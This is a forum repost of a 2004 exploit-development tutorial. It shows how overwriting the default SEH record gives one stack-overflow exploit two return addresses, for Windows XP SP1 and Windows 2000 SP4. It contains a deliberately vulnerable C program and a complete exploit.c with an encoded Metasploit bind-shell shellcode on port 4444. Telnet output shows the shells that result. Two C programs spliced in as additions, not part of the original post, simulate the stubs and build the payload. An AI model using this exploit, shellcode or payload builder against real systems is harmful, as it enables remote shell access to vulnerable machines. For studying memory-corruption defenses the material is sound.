Exploiting Default Exception Handler to Increase Exploit Sta

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-11-19 10:39 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
The goal of this method is to build one stable exploit that works against a stack buffer overflow on more than one Windows version. Every Windows application has a default exception handler whose registration record sits at the base of the thread's stack (the highest addresses), above the frames of all the functions it calls. In an ordinary stack overflow we overwrite the saved return address and stop; here we keep writing past it, through whatever stack data lies in between, until we have overwritten that default SEH record as well.

[Buf]                 <- Shellcode
[Return Address]      <- jmp register (for Windows XP SP1)
[Various Stack Data]  <- Junk
[Pointer To Next SEH] <- "\xEB\x06" + 2 padding bytes: short jmp 6 bytes forward, over the handler slot
[SE Handler]          <- jmp register (for Win2k SP4)
[Stage1 Shellcode]    <- stage1 shellcode for Win2k

If the first return address (the Windows XP SP1 one) is wrong for the machine we are on, the ret lands on an invalid address, an exception is raised, and the exception dispatcher walks the SEH chain down to the record we overwrote and calls the handler address stored there (the Windows 2000 SP4 one). That gives one exploit with two return addresses tried in order: the saved return address first, the SEH handler as the fallback. The fallback relies on EBX pointing at the overwritten SEH record when the handler is entered on Windows 2000 SP4, so that a jmp ebx executes the "\xEB\x06" short jump and skips into the Win2k stage1. Keep in mind that this is a 2004 technique: from Windows XP SP2 onwards, SafeSEH handler validation and DEP block this path for binaries built and loaded with those protections.
Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac
Vulnerable Code:
//lamebuf.c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[]){

    char buf[512];
    char buf1[1024]; // <- simulate a stack (unused, just enlarges the frame)
    //DebugBreak();

    if (argc != 2){ return -1; }

    strcpy(buf, argv[1]); // unbounded copy: this is the overflow
    return 0x0;
}
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes of "A". The application crashes with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Now let's take a look at the top of the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

Both the return address (EIP is now 41414141) and the default exception handler record have been overwritten with our input. Note that ESP also points into the input, 0x28 bytes below the SEH record; those are the two landing spots the exploit uses.
Primary Return Address (Windows XP SP1 EN):
The first return address is used exactly as in an ordinary stack overflow. At the crash ESP points into our input, right after the saved return address, so that is where the first-stage shellcode goes. The return address is 0x77F8AC16 (a jmp esp in Windows XP SP1 EN), and the first-stage shellcode is:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
That is mov ecx, esp / dec ch (six times) / mov esp, ecx / jmp esp: it moves ESP 0x600 bytes down the buffer, back into the NOP sled in front of the main shellcode, and jumps there. dec ch only touches bits 8..15 of ECX, so this only moves downwards while CH holds at least 6.

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address is reached through the SEH chain, as in an ordinary SEH overwrite. The handler address is 0x77F92A9B (a jmp ebx in Windows 2000 SP4 EN), which lands on the short jump in the pointer-to-next-SEH slot and from there on the Win2k first-stage shellcode:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
That is mov ecx, eax / dec ch (three times) / mov esp, ecx / jmp ecx: it moves the stack 0x300 bytes below whatever EAX holds when the handler is entered and jumps there, so it depends on EAX pointing into the overflowed buffer at that moment on Windows 2000 SP4.
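As an added example (not part of the original post), the following C program interprets the handful of opcodes used by the two first-stage stubs and reports where their final jmp lands. The XP path uses the post's own numbers (ESP = 0x0012FF88 at the crash, the stub at buf[1544], a 24-byte NOP sled in front of the shellcode at buf[24]). The EAX value for the Win2k path is an assumed, constructed one chosen to show the dec ch wrap-around hazard: dec ch never borrows into the upper bytes, so if CH is smaller than the number of decrements the stub jumps up instead of down.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The two first-stage stubs exactly as given in the post. */
static const unsigned char STAGE1_XP[] =
    "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
static const unsigned char STAGE1_W2K[] =
    "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

typedef struct { uint32_t eax, ecx, esp; } regs_t;

/* Run the stub over a register file. Returns the address the final jmp
 * transfers to, or 0 if an opcode outside the stubs' tiny repertoire is met. */
uint32_t stage1_target(const unsigned char *code, size_t len, regs_t *r)
{
    for (size_t ip = 0; ip + 1 < len; ip += 2) {
        unsigned char op = code[ip], modrm = code[ip + 1];
        if (op == 0x89 && modrm == 0xE1) {          /* mov ecx, esp */
            r->ecx = r->esp;
        } else if (op == 0x89 && modrm == 0xC1) {   /* mov ecx, eax */
            r->ecx = r->eax;
        } else if (op == 0x89 && modrm == 0xCC) {   /* mov esp, ecx */
            r->esp = r->ecx;
        } else if (op == 0xFE && modrm == 0xCD) {   /* dec ch: 8-bit, no borrow into bits 16..31 */
            uint32_t ch = ((r->ecx >> 8) - 1) & 0xFF;
            r->ecx = (r->ecx & 0xFFFF00FFu) | (ch << 8);
        } else if (op == 0xFF && modrm == 0xE4) {   /* jmp esp */
            return r->esp;
        } else if (op == 0xFF && modrm == 0xE1) {   /* jmp ecx */
            return r->ecx;
        } else {
            return 0;
        }
    }
    return 0;
}

/* n x `dec ch` moves the pointer down by n*0x100 only if CH >= n; otherwise
 * CH wraps and the pointer ends up (0x100-n)*0x100 ABOVE where it started. */
int dec_ch_will_wrap(uint32_t reg, unsigned n)
{
    return ((reg >> 8) & 0xFF) < n;
}

/* Where the XP stub ends up when it runs at ESP (ESP is the stub's own
 * address, since a jmp esp is what reached it). */
uint32_t xp_target_from_esp(uint32_t esp)
{
    regs_t r = { 0, 0, esp };
    return stage1_target(STAGE1_XP, sizeof STAGE1_XP - 1, &r);
}

/* Where the Win2k stub ends up for a given EAX at handler entry. */
uint32_t w2k_target_from_eax(uint32_t eax)
{
    regs_t r = { eax, 0, 0 };
    return stage1_target(STAGE1_W2K, sizeof STAGE1_W2K - 1, &r);
}

/* Offset of target inside the overflowed buffer, or -1 if it falls outside. */
long offset_in_buffer(uint32_t target, uint32_t buf_base, size_t buf_len)
{
    if (target < buf_base || target - buf_base >= buf_len) return -1;
    return (long)(target - buf_base);
}

int main(void)
{
    /* From the post: ESP = 0x0012FF88 at the crash; the PoC puts stage1_1 at
     * buf[1544] and the shellcode at buf[24] behind a 24-byte NOP sled. */
    uint32_t esp  = 0x0012FF88u;
    uint32_t base = esp - 1544;
    uint32_t t    = xp_target_from_esp(esp);
    printf("XP stub: jmp -> 0x%08X = buf[%ld]\n", (unsigned)t,
           offset_in_buffer(t, base, 1652));

    /* Assumed EAX with CH = 0x01 (constructed, not from the post): three
     * `dec ch` wrap CH to 0xFE and the stub jumps far above the buffer. */
    uint32_t eax = 0x00130180u;
    t = w2k_target_from_eax(eax);
    printf("W2K stub with EAX=0x%08X: jmp -> 0x%08X (wraps: %d)\n",
           (unsigned)eax, (unsigned)t, dec_ch_will_wrap(eax, 3));
    return 0;
}
```

With the post's values the XP stub lands at buf[8], inside the NOP sled, which is why six dec ch (0x600) was chosen for a stub sitting at buf[1544]. The Win2k run shows the check worth doing before trusting a dec ch chain: confirm in the debugger that the byte you are decrementing is large enough, or the relocation goes the wrong way.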
Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <process.h> // execve()/_execve() in the Windows CRT

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English: mov ecx,esp / dec ch x6 / mov esp,ecx / jmp esp
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English: mov ecx,eax / dec ch x3 / mov esp,ecx / jmp ecx
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc, char *argv[]){

    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf, 0x0, sizeof(buf));                    // NUL terminator after the payload
    memset(buf, 0x90, 1652);                          // 1652-byte payload, NOP wherever nothing is placed
    memcpy(&buf[24], shellcode, sizeof(shellcode)-1); // main shellcode behind a 24-byte NOP sled

    memcpy(&buf[1544], stage1_1, sizeof(stage1_1)-1); // WinXP SP1 En - Stage1 shellcode (right after RET, where jmp esp lands)
    memcpy(&buf[1592], stage1_2, sizeof(stage1_2)-1); // Win2k SP4 En - Stage1 shellcode (right after the SE handler)

    *(unsigned long *)&buf[1540] = RET_XP;     // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // Pointer to next SEH: EB 06 = jmp 6 bytes forward to stage1_2, CC CC padding
    *(unsigned long *)&buf[1588] = RET_WIN2K;  // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application with the payload as argv[1]
    execve(bufExe[0], bufExe, NULL);

    return 0x0;
}
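Added example, not the original exploit.c: a layout-driven builder for the same payload. It derives the short-jmp displacement from the offsets instead of hard-coding 6, refuses layouts that cannot work (stage1 overlapping the SEH record, shellcode reaching the return address, stage2 out of short-jmp range), and checks the finished buffer for the bytes the shellcode encoder was told to avoid, since argv delivery turns the payload into a C string that ends at the first NUL. The stub bytes, offsets and return addresses are the post's; the shellcode is a constructed 4-byte int3 stand-in so the program compiles and runs on any host.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define BUF_LEN     2048
#define PAYLOAD_LEN 1652   /* bytes handed to lamebuf.exe, as in the PoC   */
#define SLED_LEN    24     /* NOPs in front of the shellcode, as in the PoC */

/* Stubs from the post; SHELLCODE is a constructed stand-in (four int3s).
 * Drop the real encoded win32_bind blob in for actual use. */
static const unsigned char STAGE1_XP[] =
    "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
static const unsigned char STAGE1_W2K[] =
    "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
static const unsigned char SHELLCODE[] = "\xCC\xCC\xCC\xCC";

typedef struct {
    size_t   ret_off, stage1_off;                    /* saved EIP slot, stub jmp esp reaches */
    size_t   next_seh_off, handler_off, stage2_off;  /* SEH record, stub behind it           */
    uint32_t ret_addr, handler_addr;                 /* jmp esp / jmp ebx for the two targets */
} layout_t;

/* The PoC's layout: offsets and addresses taken from exploit.c above. */
static const layout_t POC = { 1540, 1544, 1584, 1588, 1592, 0x77F8AC16u, 0x77F92A9Bu };

static void put32(unsigned char *p, uint32_t v)      /* little-endian, unaligned-safe */
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* Build the payload into buf[BUF_LEN]. Returns 0, or a negative code naming
 * the layout rule that was violated. */
int build_payload(unsigned char *buf, const layout_t *L)
{
    /* "EB disp8" counts from the end of the 2-byte jmp: derive it, don't hard-code 6. */
    long disp = (long)L->stage2_off - (long)(L->next_seh_off + 2);
    if (disp < -128 || disp > 127)                              return -1;
    if (L->handler_off != L->next_seh_off + 4)                  return -2;
    if (L->stage1_off != L->ret_off + 4)                        return -3; /* jmp esp lands right after RET */
    if (SLED_LEN + sizeof SHELLCODE - 1 > L->ret_off)           return -4; /* shellcode must stop before RET */
    if (L->stage1_off + sizeof STAGE1_XP - 1 > L->next_seh_off) return -5; /* stub must not clobber SEH    */
    if (L->stage2_off + sizeof STAGE1_W2K - 1 > PAYLOAD_LEN)    return -6;

    memset(buf, 0x00, BUF_LEN);
    memset(buf, 0x90, PAYLOAD_LEN);                 /* NOP wherever nothing is placed */
    memcpy(buf + SLED_LEN, SHELLCODE, sizeof SHELLCODE - 1);
    put32(buf + L->ret_off, L->ret_addr);
    memcpy(buf + L->stage1_off, STAGE1_XP, sizeof STAGE1_XP - 1);
    buf[L->next_seh_off]     = 0xEB;                /* short jmp over the handler slot */
    buf[L->next_seh_off + 1] = (unsigned char)disp;
    buf[L->next_seh_off + 2] = 0xCC;                /* padding the jmp skips */
    buf[L->next_seh_off + 3] = 0xCC;
    put32(buf + L->handler_off, L->handler_addr);
    memcpy(buf + L->stage2_off, STAGE1_W2K, sizeof STAGE1_W2K - 1);
    return 0;
}

/* Offset of the first \x00, \x0a or \x09 within len bytes, or -1 if clean.
 * These are the bytes the encoder avoided; a NUL would cut argv[1] short. */
long first_bad_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00 || buf[i] == 0x0A || buf[i] == 0x09) return (long)i;
    return -1;
}

/* Build the PoC layout and return the displacement byte it chose (-1 on error). */
int poc_jmp_disp(void)
{
    unsigned char buf[BUF_LEN];
    if (build_payload(buf, &POC) != 0) return -1;
    return buf[POC.next_seh_off + 1];
}

/* 0 when the PoC payload builds, is bad-byte free and survives intact as argv[1]. */
int poc_selfcheck(void)
{
    unsigned char buf[BUF_LEN];
    if (build_payload(buf, &POC) != 0)            return 1;
    if (first_bad_byte(buf, PAYLOAD_LEN) != -1)   return 2;
    if (strlen((const char *)buf) != PAYLOAD_LEN) return 3;
    return 0;
}

/* A deliberately broken layout: stage2 200 bytes past the SEH record, beyond short-jmp range. */
int broken_layout_rc(void)
{
    unsigned char buf[BUF_LEN];
    layout_t L = POC;
    L.stage2_off = L.next_seh_off + 200;
    return build_payload(buf, &L);
}

int main(void)
{
    printf("selfcheck=%d jmp disp=%d broken=%d\n",
           poc_selfcheck(), poc_jmp_disp(), broken_layout_rc());
    /* On Windows the buffer would then go to lamebuf.exe as argv[1] via _execve, as exploit.c does. */
    return 0;
}
```

The bad-byte pass is the check most worth keeping: the two return addresses, the EB 06 CC CC word and both stubs all have to survive the same argv filter as the encoded shellcode, and a single \x00 in a chosen jmp address silently truncates everything after it.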
Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.